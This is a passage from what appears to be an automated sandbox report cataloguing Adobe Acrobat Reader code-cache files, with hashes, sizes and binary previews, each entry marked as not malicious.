                                                      Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ...t..[/....."#.D"..;..A.A..Eo.........H........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):223
                                                      Entropy (8bit):5.614278648013545
                                                      Encrypted:false
                                                      SSDEEP:6:mY8nYOFLvEWdrROk/IutlDiltgN16wG1:F8hRrROk/pDoA
                                                      MD5:1A22F83B2AA4B5A18C559A0EEE448A74
                                                      SHA1:5D8689724AB37A3B5489A815E351C8AEBF12DAF0
                                                      SHA-256:70112377C55DE471DE6AF2565914A8E7EC2F00B122B30C77D9A1668AD00D17C6
                                                      SHA-512:02524C68492F250AFCCCFE30ADA997F8D7B0D4A0CF41D11060EA42EC7A75EEEC4C47689B1DB937459B2050DD594B15DB1B1054C255139B7C64E094EA4EE3A791
                                                      Malicious:false
                                                      Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..l..[/....."#.DR...;..A.A..Eo...................%.k.SZ..~W.....:)'B..ad......A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):213
                                                      Entropy (8bit):5.651926912782728
                                                      Encrypted:false
                                                      SSDEEP:6:mLrnYOFLvEWdrIoJUQmJvllH7xltl4eJIi1:ehRch1HHL4eJI
                                                      MD5:2D3F7140A43F9E16D8AD75DFCD8B8FE0
                                                      SHA1:BFB42EE6A59043EB35DFFC16A7F4F6BA5475499B
                                                      SHA-256:52363137BD4B7713F25206DE0A8E7A707F94362A670AA70BEDAFC4DC59B03771
                                                      SHA-512:AC946BE6E49B08CD7DC96DCB86785D2B821F99953348BF49A9F998F44BBACCCDC1D7051B579579170892063B40D5D8663F065D44B1F89FAFB2DEA5F463C1A1F1
                                                      Malicious:false
                                                      Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ...l..[/....."#.DM..;..A.A..Eo.......W;..........;"./N_.,.:C..2....9L.H...3:...A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.559192133716083
                                                      Encrypted:false
                                                      SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvitXllsyhMktUll56mgmOZLhT79:mOEYOFLvEWdrIhuulltltU/5zgm2d/1
                                                      MD5:FCCE2E3FD161B98A277FDCE03E8DC1A4
                                                      SHA1:8891F89325D47905830BBCFEB3E431876B76D09C
                                                      SHA-256:B268E760F20EA093C3D50D372CB5FBC6097AD78EB13CDE989888990FABCD9BA0
                                                      SHA-512:64B8440E1B009281901BAE74769168E849FC89AD9254A10A21549146DDBB720EE74CE32E09743C765C8F1C70B2C6DF6A0291A4BC09D3AE8AC962A9CC5FE7C76E
                                                      Malicious:false
                                                      Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .Vsl..[/....."#.D3...;..A.A..Eo........T........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):188
                                                      Entropy (8bit):5.577667084672285
                                                      Encrypted:false
                                                      SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvWEttllZP/Mktt5l/EBiaQ562HvpMm1:mAElVYOFLvEW1KFEtXlZ/ltLlpx56uv7
                                                      MD5:3BE5A6C0D12D856677CA1A15D6B19BF5
                                                      SHA1:758385CD15D2D4AF98F500925A2F24450A1846F6
                                                      SHA-256:1E8A3C5FBA251D68AD9A2C48170BC740876DA656BAD2E5D7973462316A5D2F10
                                                      SHA-512:DBCA3618F1CA4212B93FE19286AB0321AC737FF8C0E76C132CEA8AEE0041EF09E586E469B3C87412666D96B09139293CE99BF82CD68908BAE5EDC7A40B1FA228
                                                      Malicious:false
                                                      Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ...a..[/....."#.D.N..;..A.A..Eo......`...........z?...SwC...^..y.....V..7R-O.....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):214
                                                      Entropy (8bit):5.629555573831975
                                                      Encrypted:false
                                                      SSDEEP:6:mWYOFLvEWdBJvvuYHH/ltmflUDLYtmOZn1:xRBJXdwfODcFZ
                                                      MD5:89B7A1A03E053ABE926826A1106376DD
                                                      SHA1:FC5943EB2198DAF49ECD5F3B7A634783101BBB18
                                                      SHA-256:52F5DC2687A57F98196EB6BA016A02940AE3A687A011971E076F7B8C7019CDBD
                                                      SHA-512:C05540F0B4595B01A2D9B766AEF7CB1BCD9E110EB1ACE73C0AAA755D781BEE570D292E8A817F3D10CA2FE66F72C06E9BBA924CD45BCF43D05B6CB2AA0492B8DD
                                                      Malicious:false
                                                      Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js .B.t..[/....."#.D...;..A.A..Eo.......21.............t.q..W.EZ....1...[.zC.7mD..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):211
                                                      Entropy (8bit):5.55999646068592
                                                      Encrypted:false
                                                      SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFv231Mkti//npSKGoSSl0JGd:msRPYOFLvEWIa7zp7531ltiX8VPu1
                                                      MD5:C190F704A8B1D9D7BEEB79A0DC93A8F9
                                                      SHA1:E86319DD6BF2AA80349BECB1B10DAC616C443682
                                                      SHA-256:9A869B402A1FE71922EA0CFA781FB10DE8366DD9438CE253582A8CAEB61CF514
                                                      SHA-512:8684098BA9727E0D3008F9ABA231E12B796A62FB2D3D5EF53BD49A25D67AD8697B5215E9AC8DE041C182ABE9751C34C55FD1689687EC5EB049AB4B0995A5AD5B
                                                      Malicious:false
                                                      Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..P_..[/....."#.D.'{.;..A.A..Eo......AE.............L...Im.@.........E.nW...IP..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.5977086884348655
                                                      Encrypted:false
                                                      SSDEEP:3:m+lQi9lC8RzYOCGLvHkWBGKuKjXKVRNUpXKLuVSh/lm40hMkt1ln6F4XVAZ+8cV4:mKPYOFLvEWdENU9QN/lAltSwiM3Y1
                                                      MD5:EEE04CF5525BE1C46144AC712446659A
                                                      SHA1:9AA8DFB51FFD209ED966C102F1EC0AE96828A56A
                                                      SHA-256:9DDF2BCB596AF7DEB79ED3FCD851A4FE0397CCA1FB3912A36078F5F00DAA1284
                                                      SHA-512:E24D76485430C3DA670DC0361B73FE35531AC89120835F0BFBFB67FB9B08170E878DC8836B21B1E27D60BD6612BEAE98907450F4C109772C41F335717DF95072
                                                      Malicious:false
                                                      Preview:0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js .._n..[/....."#.D....;..A.A..Eo.....................M....m+lS..e.....<7.U.P8*.0K.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.614270435733211
                                                      Encrypted:false
                                                      SSDEEP:6:mQt6EYOFLvEWdccAHQ57H8ltgmjBRCh/41:XRc9g7Hu+mDi/
                                                      MD5:9B0686CEAA85C6685183CD3EB2E86672
                                                      SHA1:36D00752C97968D2C7376C0C50B222E5894C8669
                                                      SHA-256:E8F3D1B06143AE76D79080A943C1DB20CE800EB9684765D61FF9FA68BFF2748D
                                                      SHA-512:0A497C60D246BD41145A7C4717E07805E2DA8027FE08C4BC856D99A0A9E5E0EFB2D7C0EF7C697AC6084F20B19A5F730D521F364A43EA5D177BD4DB1DC4B7D0A8
                                                      Malicious:false
                                                      Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ...u..[/....."#.DPo.;..A.A..Eo..................PJm...0x.x..RD...BB!@5..<..]....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):231
                                                      Entropy (8bit):5.579037597799908
                                                      Encrypted:false
                                                      SSDEEP:6:mqs6XYOFLvEWdFCi5mhuYDtll9ltbkULlF4r1:bs6xRkiWp/PN7LlF4
                                                      MD5:E85DAC2661C02DFEAB614B02388D72E9
                                                      SHA1:A87AE62BC869D4FF6049E1F2BD24CFD574D5D890
                                                      SHA-256:EB154E0989A8D9FA7BFFB9B82740A8FA5D51BD2CC6E2F77B570137BC81D52B45
                                                      SHA-512:3BFD7C3420656F3CA3E330F4BE9ED9072D17357D191245E9E4CD7B870AF5CA7AD333253B8B24838CA54FEE2FA7DC79B2CEE87644AF17F6C5257FD7E2ACA2C0FF
                                                      Malicious:false
                                                      Preview:0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ......[/....."#.D.E .;..A.A..Eo.......ln3.........P...#4..l....5...5..).w.. .h.~..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):215
                                                      Entropy (8bit):5.52546850081235
                                                      Encrypted:false
                                                      SSDEEP:3:m+lPHYs8RzYOCGLvHkWBGKuKjXKXqjuSKPWFvEThtxyz8k/MktHllPECcu1isLKo:mhYOFLvEWd/aFuaTrSxltnEN941
                                                      MD5:48A6C4A6BB9F26D934341EF38031D3A3
                                                      SHA1:8A0399647679C389C88B5663193E099DCF385854
                                                      SHA-256:D939197BD87D74AFC8C64377440D8FEF42BBA9726B5304532773B16242F24130
                                                      SHA-512:B67946F69FCA0966BC8C8F02F1D28BFEC7D463A2E662D747A4A96C9BFE61DB4ECA5BFC4E9EE6FD7766CD669C02917BE4350A37792A3E67C81CDA3ED4AA5587D3
                                                      Malicious:false
                                                      Preview:0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ..Dv..[/....."#.D.Z.;..A.A..Eo......J/._...........a.f.m.i.o.p..3U5.....^...I.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.555764039859368
                                                      Encrypted:false
                                                      SSDEEP:6:mR9YOFLvEWd7VIGXOdQDTrGGltrBMqVd3G4K41:2DRuR8GMdB9Vd2
                                                      MD5:7DE67D4E058A744A33E849FB21E520FE
                                                      SHA1:D78CD974F929BD7302A134C00CDAF822DE716BA0
                                                      SHA-256:9664618573589E3561D0B414C38726D1262D5E30F208FFE0AFA22D78D42C5A44
                                                      SHA-512:F68C01B0A6D1805B94F7670BE116E035D29854A789A6FDA8C64937FEEC6A032B626D1BD38AAFF2DF1380DC856B170B79A26DD520BFEC11F9FC7C5EFF2CF998A5
                                                      Malicious:false
                                                      Preview:0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js .'"v..[/....."#.D.(.;..A.A..Eo........g...........y.$..$.v5j...T...z.]..._S....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.619652240919578
                                                      Encrypted:false
                                                      SSDEEP:6:mkqYOFLvEWd8CAd9QU/q2VltaduA424r1:+RQH/qMpr
                                                      MD5:6E4B7667D472EA11E0B7D04878445222
                                                      SHA1:4987076E35CDD840ADCB1AC61808FDB835470BBA
                                                      SHA-256:5A10AE42A1D2B94C1AE3E983A457503853389F42305C001F105F82C4AA9D949C
                                                      SHA-512:F21A7DF26F23EA32869A1FAF945B9115A3C6AA8EC65160B2B4E1EA5529C969CD52A3B332ED2A6BF85C79119D09ABAFE38EE0F6D7352FAF2DBC0A25246CCFCB3B
                                                      Malicious:false
                                                      Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...v..[/....."#.D.S.;..A.A..Eo........).........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210
                                                      Entropy (8bit):5.593452544064119
                                                      Encrypted:false
                                                      SSDEEP:3:m+lS5Etla8RzYOCGLvHkWBGKuKjXKVRNUp/KPWFvpl/lJs1qMktq/t7Ag2iHio/1:moXXYOFLvEWdENUAuBlJtltq/+yC8n1
                                                      MD5:2AEE88E96E565459EE40B76D92D2E414
                                                      SHA1:3D92C79B132460806C890B312B286FCBCB86DEAD
                                                      SHA-256:8553881E9F5507BF53D367894F1C807422F14187F13CCC747AF5EC184BA5F132
                                                      SHA-512:68C47242EF43F6CC6AB337C10E158F0809E5F21BFF943A9B12574BA1CC2E6242925E52D228B6E65D38FA6E7AB8A3DE05422ED6B132E64E58B3328F23331BA462
                                                      Malicious:false
                                                      Preview:0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js ...n..[/....."#.DG8..;..A.A..Eo......<dF.........8.../...;.\\o....1..........+..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):221
                                                      Entropy (8bit):5.617868898043463
                                                      Encrypted:false
                                                      SSDEEP:6:mQZYOFLvEWdrROk/VQwtllztltJOsLmB41:nRrROk/V/1zfuN
                                                      MD5:EDCA0B889BA86D8EA0FDE900B65FCE7C
                                                      SHA1:D76605DBBCC8226C566E247214D4F01E8CC9703E
                                                      SHA-256:809FD330820AC9EFF536D742D7FAE8026B6632ABC2400BB6E6622B35A675E253
                                                      SHA-512:7A078CB033AEB62145FE7DF8AEA31DE1018445D1BEFFF128C2EB3F2D86C1444CAB2D9014AF478064C4343A9B102B54AE4201A24A1814B67A5152206DFDA05E00
                                                      Malicious:false
                                                      Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js .S.l..[/....."#.D.:..;..A.A..Eo......A........... ./.ev......N~..6.b.....$.j;:C...A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210
                                                      Entropy (8bit):5.562030971376572
                                                      Encrypted:false
                                                      SSDEEP:3:m+lUV/la8RzYOCGLvHkWBGKuKjXKjcAW6KPWFvis6u9u/MktE3Xrobk9mZa6tokA:mZ/lXYOFLvEWdccAWun9u/ltYdm9741
                                                      MD5:F78E376A75D3EF1A0C23F137965EE876
                                                      SHA1:83B16E88AB38010653CCAC0D8D838A12A67500D5
                                                      SHA-256:B8076DECBB6051AD73D70D768703EFDB7BFAE11638D0ADF709519E1C9001EA87
                                                      SHA-512:20DE10BFE9BDEE850EC9814DCD037740B11A5148380ABA111D20FF2A5A63C17DAA2B81AA9ACCEDB16C27DEDBDD3628651DC525E64EE918D001EA2ED3F1CEF391
                                                      Malicious:false
                                                      Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ..mt..[/....."#.Dx..;..A.A..Eo......>..............U...I.>P...X...x..0U.~;m.x.k.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):204
                                                      Entropy (8bit):5.554651713669504
                                                      Encrypted:false
                                                      SSDEEP:6:mMOYOFLvEWdwAPVufVJ9l//lta/OB6Jn1:2R16VJ9l/9MB
                                                      MD5:BDEF0BAFB7018C8839A3A1954E37C4CD
                                                      SHA1:8FA2FCB5C10BF293BCB0F07436EDDB1024AE98F4
                                                      SHA-256:44671D58D4FDA1027F152FD853D7D417DB089509CE5A9944B7BAD3853CC7596D
                                                      SHA-512:E995689FCB245A52867011B9A5CBC6CF9BF36DBBCEBF6E052F197216018B75B88DC9F9C7CFC564738AD0A86F98C563FCAEC0E5E227C7FA24C2E7268D15DB0FC1
                                                      Malicious:false
                                                      Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ...m..[/....."#.D/...;..A.A..Eo.......x.T.............k....F..D..O.n;[.1m.....=..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):212
                                                      Entropy (8bit):5.664042270149457
                                                      Encrypted:false
                                                      SSDEEP:3:m+lUDflllla8RzYOCGLvHkWBGKuKjXKBRSJvBCvlKLuVnuf73hMktrHl4N/hcfsy:m3PXYOFLvEWdBJvYQdNltrohcsBXIh1
                                                      MD5:021B24E2AD5FC266E9976C3E79CC7095
                                                      SHA1:B7F017890A8D9EFFCCECC98268D7CE5492DBA4D0
                                                      SHA-256:7634B6FE88352248E1A00D211B9342273790F75F2D3DB9B95997A7B3455E53C7
                                                      SHA-512:3BF86ABF138CD968968FCD83D970EE22E460F22F001916B8EEF9BC802C65CA52BA033165F489FA26F316969821E7B2670D4B30D70476082FF22B5C41B6010679
                                                      Malicious:false
                                                      Preview:0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ...u..[/....."#.D....;..A.A..Eo.......9.............k..`..N3.... ..d..$[.....{.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):228
                                                      Entropy (8bit):5.5768809701556705
                                                      Encrypted:false
                                                      SSDEEP:6:msPYOFLvEWdrROk/RJUQslNqltbdllBc3Me/1:3RrROk/sjNQldllB
                                                      MD5:1D9BDC5CD36DF8F27AF11734B78A62A9
                                                      SHA1:AD29D46669C6596449239C6AEB317F3206A6A168
                                                      SHA-256:2969EC4F249815A9699E06DFA69CA665819C119C5D00EBE6A381BB6155BBE9CD
                                                      SHA-512:DFBC7228E26BA725F0AB2DEC47C976DD6EFB3C8FD0A9643E6D5F906A054085DABDBA4AF08AE1D8FEAD936D5D031F1B45758C6B1F5EA6E28171C534A74C1E839F
                                                      Malicious:false
                                                      Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ...l..[/....."#.D].;..A.A..Eo........$..............9Q].8O.z....=..:.N.{....N{.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1080
                                                      Entropy (8bit):5.169186397709997
                                                      Encrypted:false
                                                      SSDEEP:12:fKltJ9MZ9a1+/l/CX5toYLlAftIquK9ggMzBo9XRdUOxTi+/l/WIGY5E9zyDJQdT:il76ZsJafqrWMgykN4HyrvBoX
                                                      MD5:0306B1FB9EFF9239E71C3A2CBDD0F3C4
                                                      SHA1:1CEDDA57A79BBA581287B00BA889D473F76A2B77
                                                      SHA-256:F493876FF0FD823B82618055F9F9C2C9C0F642C7A8D7E33EF89E55627A25E752
                                                      SHA-512:5475C428ABE122A07DCDFC661C733B3C871F3975AB7AD097E89489344F11437F0DA80470CC99E140B4F1EA5B8CE5D0F345C2773B87970E5C089AAF48137224BF
                                                      Malicious:false
                                                      Preview:0....AhMoy retne....+........V............*....a..[/...........;.y~A...a..[/..............oB*@SR..[/............#...(...A_./.............D.4...p..[/..........[.i..%...p..[/.............k7A...a..[/..........]...I......[/.........,+..._.#..a..[/.........<...W..J@SR..[/..........J..j.....p..[/...........6<|...@SR..[/...........2q......a..[/...........P....V..a..[/.........!...0.o..p..[/............P[. q..a..[/...........3.....a..[/..........v...q....a..[/...........a....@SR..[/..........C..M.....A_./.........qi.K.L.9.....[/.........K..JM.gb.....[/.....................[/.........F..=z;...a..[/.............o...a..[/.........Gy.'.h...a..[/.........:..N.A....a..[/..........;/...a..[/..................a..[/.........A?.2:....p..[/..............q...p..[/..........u\]..q..p..[/..........o..k....p..[/...........*......p..[/.........^.~..z...p..[/..........+.{..'..p..[/..........@..x...p..[/.........*)....J:..p..[/..........&.S......p..[/............MV3....p..[/.........

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1080
                                                      Entropy (8bit):5.169186397709997
                                                      Encrypted:false
                                                      SSDEEP:12:fKltJ9MZ9a1+/l/CX5toYLlAftIquK9ggMzBo9XRdUOxTi+/l/WIGY5E9zyDJQdT:il76ZsJafqrWMgykN4HyrvBoX
                                                      MD5:0306B1FB9EFF9239E71C3A2CBDD0F3C4
                                                      SHA1:1CEDDA57A79BBA581287B00BA889D473F76A2B77
                                                      SHA-256:F493876FF0FD823B82618055F9F9C2C9C0F642C7A8D7E33EF89E55627A25E752
                                                      SHA-512:5475C428ABE122A07DCDFC661C733B3C871F3975AB7AD097E89489344F11437F0DA80470CC99E140B4F1EA5B8CE5D0F345C2773B87970E5C089AAF48137224BF
                                                      Malicious:false
                                                      Preview:0....AhMoy retne....+........V............*....a..[/...........;.y~A...a..[/..............oB*@SR..[/............#...(...A_./.............D.4...p..[/..........[.i..%...p..[/.............k7A...a..[/..........]...I......[/.........,+..._.#..a..[/.........<...W..J@SR..[/..........J..j.....p..[/...........6<|...@SR..[/...........2q......a..[/...........P....V..a..[/.........!...0.o..p..[/............P[. q..a..[/...........3.....a..[/..........v...q....a..[/...........a....@SR..[/..........C..M.....A_./.........qi.K.L.9.....[/.........K..JM.gb.....[/.....................[/.........F..=z;...a..[/.............o...a..[/.........Gy.'.h...a..[/.........:..N.A....a..[/..........;/...a..[/..................a..[/.........A?.2:....p..[/..............q...p..[/..........u\]..q..p..[/..........o..k....p..[/...........*......p..[/.........^.~..z...p..[/..........+.{..'..p..[/..........@..x...p..[/.........*)....J:..p..[/..........&.S......p..[/............MV3....p..[/.........

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF7003b8.TMP (copy)

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1080
                                                      Entropy (8bit):5.169186397709997
                                                      Encrypted:false
                                                      SSDEEP:12:fKltJ9MZ9a1+/l/CX5toYLlAftIquK9ggMzBo9XRdUOxTi+/l/WIGY5E9zyDJQdT:il76ZsJafqrWMgykN4HyrvBoX
                                                      MD5:0306B1FB9EFF9239E71C3A2CBDD0F3C4
                                                      SHA1:1CEDDA57A79BBA581287B00BA889D473F76A2B77
                                                      SHA-256:F493876FF0FD823B82618055F9F9C2C9C0F642C7A8D7E33EF89E55627A25E752
                                                      SHA-512:5475C428ABE122A07DCDFC661C733B3C871F3975AB7AD097E89489344F11437F0DA80470CC99E140B4F1EA5B8CE5D0F345C2773B87970E5C089AAF48137224BF
                                                      Malicious:false
                                                      Preview:0....AhMoy retne....+........V............*....a..[/...........;.y~A...a..[/..............oB*@SR..[/............#...(...A_./.............D.4...p..[/..........[.i..%...p..[/.............k7A...a..[/..........]...I......[/.........,+..._.#..a..[/.........<...W..J@SR..[/..........J..j.....p..[/...........6<|...@SR..[/...........2q......a..[/...........P....V..a..[/.........!...0.o..p..[/............P[. q..a..[/...........3.....a..[/..........v...q....a..[/...........a....@SR..[/..........C..M.....A_./.........qi.K.L.9.....[/.........K..JM.gb.....[/.....................[/.........F..=z;...a..[/.............o...a..[/.........Gy.'.h...a..[/.........:..N.A....a..[/..........;/...a..[/..................a..[/.........A?.2:....p..[/..............q...p..[/..........u\]..q..p..[/..........o..k....p..[/...........*......p..[/.........^.~..z...p..[/..........+.{..'..p..[/..........@..x...p..[/.........*)....J:..p..[/..........&.S......p..[/............MV3....p..[/.........

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_983b7a3da8f39a46_0_1 (copy)

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):208
                                                      Entropy (8bit):5.559192133716083
                                                      Encrypted:false
                                                      SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvitXllsyhMktUll56mgmOZLhT79:mOEYOFLvEWdrIhuulltltU/5zgm2d/1
                                                      MD5:FCCE2E3FD161B98A277FDCE03E8DC1A4
                                                      SHA1:8891F89325D47905830BBCFEB3E431876B76D09C
                                                      SHA-256:B268E760F20EA093C3D50D372CB5FBC6097AD78EB13CDE989888990FABCD9BA0
                                                      SHA-512:64B8440E1B009281901BAE74769168E849FC89AD9254A10A21549146DDBB720EE74CE32E09743C765C8F1C70B2C6DF6A0291A4BC09D3AE8AC962A9CC5FE7C76E
                                                      Malicious:false
